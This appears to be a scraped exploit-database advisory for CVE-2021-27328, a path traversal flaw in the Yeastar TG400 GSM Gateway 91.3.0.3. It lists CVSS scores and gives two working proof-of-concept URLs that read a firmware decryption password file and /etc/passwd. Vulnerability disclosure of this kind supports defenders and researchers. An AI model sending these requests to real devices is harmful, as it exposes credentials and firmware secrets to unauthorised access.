Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal

2021.02.27

Credit: SQSamir

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2021-27328

CWE: CWE-22

CVSS Base Score: 4/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8/10

Exploit range: Remote

Attack complexity: Low

Authentication: Single time

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3
This is a Proof of Concept for CVE-2021-27328
Example
to get firmware decrypting password
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect
to get /etc/paswd
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Yeastar TG400 GSM Gateway 91.3.0.3 Path Traversal

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.